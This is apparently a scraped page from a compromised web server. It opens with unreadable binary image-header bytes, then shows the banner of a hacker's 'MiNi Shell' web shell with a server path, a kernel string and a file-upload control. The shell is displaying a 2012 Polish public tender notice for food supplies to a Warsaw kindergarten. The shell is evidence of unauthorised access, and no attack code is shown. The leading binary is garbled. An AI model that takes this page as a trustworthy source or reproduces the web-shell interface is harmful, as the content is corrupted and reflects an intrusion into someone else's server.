JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/471082-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 9 pakietów</b><br>
<b>Numer ogłoszenia: 471082 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 12 , ul. Niska 9, 00-176 Warszawa, woj. mazowieckie, tel. 22 831 72 09, faks 22 831 72 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole12.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 03.20.00.00-3, 03.10.00.00-2, 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole12.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 12
ul. Niska 9
00-176 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 10:00, miejsce: Przedszkole Nr 12
ul. Niska 9
00-176 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułki barowe krojone 300 g	szt.	1050
Kajzerki 50 g	szt.	800
Paluchy 50 g	szt.	600
Chleb biały pszenny  600 g	szt.	1000
Chleb razowy krojony 500 g	szt.	500
Ciasto drożdżowe	kg	15
Pączki z marmoladą	szt.	100
Chałki 400 g	szt.	100
Bułki maślane min. 50 g	szt.	400
Bułka tarta 500 g	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko o zawartości tłuszczu min  3,2 % opakowanie foliowe 
1 litr z dopłatą.	szt.	1600
Mleko o zawartości min 3,2 % tłuszczy, opakowanie foliowe 1 litr	szt.	1850
Mleko smakowe- z dopłatą
 różne smaki (pojemność 0,2 l ze słomką)	sz.	600
Śmietana o zawartości tłuszczu 18% opakowanie kubek 400 g 	szt.	500
Śmietana o zawartości tłuszczu 30 % opakowanie karton 1 litr	szt.	500
Masło świeże o zawartości tłuszczu min. 67 % kostka 200 g	szt.	1300
Twaróg biały półtłusty (kliniki - 250 g)	kg	350
Ser żółty łagodny z dopłatą (90 % sws) bloki po ok. 1,5 kg	kg	45
Ser żółty łagodny (90 % sws) bloki po ok. 1,5 kg.	kg	50
Serek topiony kostka 100 g, śmietankowy z szynką	szt.	50
Jogurt owocowy, różne smaki op. Kubek 120 - 150 g	szt.	600
Napój mleczny, probiotyk typu actimel	szt.	600
Twarożek waniliowy, op. kubek min. 200 g 	szt.	200
Deser czekoladowy i  waniliowy op. Kubek 175 g 	szt.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA, OWOCE KRAJOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Burak czerwony, świeży gat. I	kg	250			
Cebula biała, świeża, bez szczypioru gat. I	kg	250			
Czosnek	szt.	60			
Dymka, szczypior,  świeża, duże pęczki ze szczypiorem  gat. I	szt.	150			
Fasolka szparagowa, zielona/żółta świeża gat. I	kg	40		 	
Botwina, świeża, duże pęczki  gat. I	szt.	50			
Kalafior, świeży gat. I	szt.	55			
Brokuł świeży  gat. I	szt.	35			
Kapusta biała w główkach, świeża gat. I	kg	120			
Kapusta kiszona, op. wiaderko min. 3 kg, nie przekwaszona,  gat. I	kg	85			
Kapusta czerwona, główka, świeża, gat. I	kg	75			
Kapusta pekińska ,świeża, gat. I	kg	130			
Kapusta włoska	kg	20			
Koperek, świeży, duże pęczki, gat. I	szt.	100			
Marchew, świeża, czysta, gat. I	kg	500			
Natka pietruszki, duże pęczki, gat. I	szt.	180			
Ogórki kwaszone, pakowane w wiaderko min. 3 kg, gat. I	kg	170			
Ogórki małosolne, pakowane w wiaderko min. 3 kg, gat. I	kg	10			
Pieczarki, świeże, duże, gat. I	kg	120			
Pietruszka, korzeń, świeża, gat. I	kg	230			
Pomidory, świeże, słodkie, gat. I	kg	230			
Pory, świeże, gat. I	kg	220			
Rzodkiewki, duże pęczki, świeże, gat. I	szt.	800			
Sałata zielona, świeża, duże główki, gat. I	szt.	400			
Seler, korzeń, świeży, gat. I	kg	280			
Ziemniaki jadalne, sypkie,  nie nadmarznięte, bez rdzawych plam, czyste, suche, bez kiełków, duże ( preferowana odmiana irga, irys), gat. I	kg	4900			

Papryka świeża (żółta, czerwona), gat. I
	kg 	120

Cykoria świeża, gat. I
	kg	10

Ogórki zielone, świeże, gat. I
	kg	220

Biała rzodkiew
	Kg	30

Jabłka, świeże - Gala , smaczne, kruche, soczyste, średniej wielkości, gat. I
	kg	1800

Gruszki-  konferencja, świeże, żółte, dojrzałe, gat. I
	kg	300

Śliwki deserowe, słodkie,  gat. I
	Kg	150

Truskawki świeże, bez oznak pleśni, pakowane w łubianki po 2 kg gat. I
	kg	60

Jagody świeże, pakowane w kartonik 0,5 kg  gat. I
	kg	15

Maliny świeże, pakowane w kartonik 0,5 kg gat. I
	kg	20

Morele świeże,   gat. I
	kg	20

Brzoskwinie krajowe
	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> OWOCE CYTRUSOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pomarańcza, słodka, soczysta, gat. I	kg	100
Mandarynka, słodka, soczysta,  gat. I	kg	200
Banan, smaczny, dojrzały, bez rdzawych plam  gat. I	kg	630
Winogrona białe, słodkie, gat. I	kg	220
Kiwi, dojrzałe, słodkie, duże, gat. I	szt.	1700
Cytryny, średniej wielkości z cienka skórą, gat. I	kg	50
Arbuzy, dojrzałe, słodkie, świeże,   gat. I	kg	200
Brzoskwinie świeże, słodkie, soczyste, gat. I	kg	50
Nektarynki, świeże, słodkie, soczyste ,gat. I	kg	50
Melon słodki, soczysty	kg	30
Kaki gat. I - dojrzałe, miękkie, słodkie	szt. 	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczaki świeże, gat. I	kg	150
Łopatka wieprzowa bez kości, gat. I	kg	220
Schab wieprzowy bez kości , gat.  I	kg	120
Wołowina pieczeniowa bez kości, gat. I	kg	70
Szponder wołowy, rosołowy, gat. I	kg	100
Mięso od szynki wieprzowe, gat. I	kg	140
Wątróbka z kurczaka, gat. I	kg	50
Cielęcina pieczeniowa	kg	30
Podudzie z kurczaka, gat. I	kg	180
Porcja rosołowe z kurczaka, gat. I 	kg	410
Filet z kurczaka, gat. I 	kg	60
Filet z indyka, gat. I	kg	60
Słonina świeża, gat. I	kg	10
Szynka wieprzowa, gotowana, chuda, świeża,  gat. I	kg	80
Polędwica wieprzowa, chuda, świeża, gat. I	kg	50
Kiełbasa typu krakowska, parzona,  gat.  I	kg	40
Kiełbasa krakowska podsuszana, gat. I	kg	40
Kiełbasa szynkowa, chuda gat. I	kg	40
Kiełbasa salami, gat. I	kg	30
Parówki odtłuszczone, gat. I	kg	150
Kiełbasa wieprzowa, cienka, chuda gat. I	kg	110
Polędwica z indyka, wędzona  gat. I
	kg	25
Pasztet typu podlaski - puszka ( 155g.)	Kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MROŻONKI I RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka kompotowa, min. 4 składnikowa, na bazie czarnej porzeczki, (opakowanie foliowe, 2,5 kg) gat. I	kg	250
Zupa jarzynowa, min. 5 składników, (opakowanie foliowe  2,5 kg)gat. I	kg	50
Marchew kostka (opakowanie foliowe  2,5 kg) gat. I 	kg	25
Brokuły,(opakowanie foliowe  2,5 kg) gat. I	kg	25
Kalafior, (opakowanie foliowe  2,5 kg) gat. I	kg	20
Fasolka szparagowa zielona/ żółta (opakowanie foliowe  2,5 kg) gat. I	kg	50
Bukiet jarzyn min. 5 składników  (opakowanie foliowe  2,5 kg) gat. I	kg	30
Mini marchewka, (opakowanie foliowe  2,5 kg) gat. I	kg	50
Szpinak siekany, (opakowanie foliowe  2,5 kg) gat. I	kg	30
Truskawka, (opakowanie foliowe  2,5 kg) gat. I	kg	70
Maliny ( opakowanie 2,5 kg ) gat. I	kg	70
Groszek zielony, (opakowanie foliowe  2,5 kg) gat. I	kg	30
Brukselka, (opakowanie foliowe  2,5 kg) gat. I	kg	25
Dorsz, filet bez skóry, bez ości, (opakowanie foliowe  w kartonie waga min. 5 kg)	kg	100
Tilapia,  filet bez skóry, bez ości, (opakowanie foliowe  w kartonie waga min. 5 kg)	kg	110
Miruna,  filet bez skóry, bez ości, (opakowanie foliowe  w kartonie waga min. 5 kg)	kg	110.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, świeże, klasa A, gat. I wielkość  min. L	szt.	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRODUKTY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały, sypki, op. papierowe 1 kg gat. I	kg	850
Mąka pszenna, op. papierowe 1 kg gat. I	kg	350
Mąka ziemniaczana op. min. 400 g. gat. I 	kg	20
Kasza manna, op. papierowe 1 kg gat. I	kg	40
Kasza  jęczmienna, op.  min. 400 g. gat. I	kg	70
Kasza gryczana, op. min,. 400 g. gat. I	kg	70
Ryż biały, op. papierowe min. 1 kg gat. I	kg	100
Makaron ( kolanka, świderki, nitki) op. min, 0,5 kg gat. I	kg	240
Sól jodowana, op. foliowe min. 1 kg gat. I	kg	150
Płatki owsiane - błyskawiczne, op. min. 400 g, gat. I	kg	40
Płatki ryżowe, błyskawiczne, op. min 400 g. gat. I	kg	40
Płatki kukurydziane bez dodatków, op. 250 g. gat. I	szt.	80
Płatki miodowe, op. 250 g. gat. I	szt.	80
Płatki cynamonowe, op. 250 g. gat. I	szt.	80
Płatki zbożowe o smaku czekoladowym, op. min. 25 g. gat I.	szt.	80
Żurek w postaci proszku bez konserwantów, op. min 50 g. gat. I	szt.	150
Żurek w butelkach gat. I	Szt.	150
Budyń bez sztucznych barwników, bez cukru, różne smaki, op. min. 60 g. gat. I	szt.	150
Fasola sucha, op. foliowe min,. 500 g. gat. I	kg	45
Groch  łuskany, op. foliowe min. 500 g, gat. I	kg	45
Groszek konserwowy, op. puszka, min. 400 /240 g. gat. I	szt.	40
Kukurydza konserwowa, op. puszka min. 340/285 g, gat. I	szt.	40
Ogórki konserwowe, op. słoik 0,9 l, gat. I	szt. 	20
Koncentrat pomidorowy, min. 30 %, pakowany w słoiki 
min 230 g. gat.I	szt,	380
Brzoskwinie, połówki owoców, opakowanie puszka min. 820/470 g. gat. I	szt. 	40

























































































































		
Ananas, plastry, op. puszka min. 565/335 g. gat. I
	szt.	40
Olej rzepakowy z pierwszego tłoczenia, op. min 1 l. Butelka plastikowa gat. I	l	200
Dżemy niskosłodzone, op. słoik min. 280 g.  smaki: czarna porzeczka, truskawka, brzoskwinia gat. I	szt.	108
Kakao o obniżonej zawartości tłuszczu, op. min. 200 g. gat. I	szt.	70
Cukier  puder, op. min 400 g. gat. I	kg	20
Galaretka owocowa, bez sztucznych barwników, różne smaki, op. papierowe, min  75 g. 	szt. 	250
Pieprz  czarny, mielony ,op. papierowe, min. 20 g.  gat. I	szt.	60
Pieprz czarny ziarnisty, op. min 20 g.  gat. I	szt.	50
Pieprz ziołowy, op. min. 20 g. gat. I	szt.	80
Majeranek otarty, op. papierowe, min. 8 g. gat. I	szt.	50
Liść laurowy, op. min. 6 g. gat. I	szt. 	60
Proszek do pieczenia, op. papierowe min. 15 g. gat. I
	szt.	100
Soda oczyszczona op. 15g.	szt.	10
Cukier waniliowy, op. papierowe min. 5 g. gat. I	szt.	180
Cynamon mielony, op. papierowe min. 10 g. gat. I	szt.	10
Wiórki kokosowe, op. foliowe min. 100 g.  gat. I	szt.	20
Ziele angielskie, op. papierowe min. 15 g. gat. I	szt. 	45
Przyprawa do potraw w postaci proszku , op. min 250 g. gat. I	szt.	70
Drożdże piekarnicze, świeże, op. 100 g. gat. I	szt.	50
Rodzynki. gat. I	kg	10
Suszone morele  gat. I	kg	20
Pestki z dyni	kg	5
Orzech włoski łuskany	kg	10
Śliwki suszone bez pestek	kg	10
Soki owocowe 100% w kartonach bez konserwantów, pojemność min. 1 l. Różne smaki: pomarańczowy, czarna porzeczka, wiśnia, jabłko gat. I po 275 szt-  każdego rodzaju	szt.	900
Soczki jabłkowe ze słomką poj. 0,2 l	szt	300
Syrop malinowy bez konserwantów, butelka szklana 430 ml. gat. I	szt.	180
Majonez, słoik 400 ml. gat. I	szt.	150
Oliwa z oliwek opakowanie 1 litr	l.	20
Herbata czarna, torebki, op. min. 100 saszetek gat. I	szt.	30
Herbata owocowa, torebki, op. min. 20  sztuk, różne smaki: leśna, owocowa, malinowa.	szt.	250
Kisiel z Wit. C, bez konserwantów i sztucznych barwników, op. min. 77 g.  gat. I	szt.	200
Kwasek cytrynowy, op. papierowe min. 20 g.  gat. I	szt.	60
Sezamki, op. min. 27,2 g.	Szt.	120
Mix- orzechy ,  suszone owoce, typu mieszanka studencka, min.200 g	Szt.	120
Czekoladowy Mikołaj- czekolada mleczna  60 g.	szt.	120
Chałwa waniliowa,100 g.	szt	120
Daktyle suszone bez pestek 150g	Szt.	120
Migdały -100g	Szt.	120
Ocet spirytusowy 10%- op. 0,5 l.	l	10
Wafle bez czekolady, pojedynczo pakowane, min 50 g.	szt.	200
Chrzan tarty w słoiku min. 260 g. bez dodatku octu	szt.	30
Przyprawa do kurczaka (sól, papryka słodka, ostra, czosnek, kurkuma, kolendra, kozieradka, imbir, kmin rzymski, cynamon, goździki, gałka muszkatołowa, chili) op. papierowe, min,. 35 g.	szt.	80
Przyprawa do zup w płynie, butelka 960 g. 	Szt.	40
Papryka słodka w proszku 35g	szt	30
Lubczyk ogrodowy 8g	szt	30
Musztarda łagodna ,op. plastikowe 190 g.	Szt.	60
Keczup łagodny, bez konserwantów, op. butelka plastikowa, 
250 g.	szt.	100
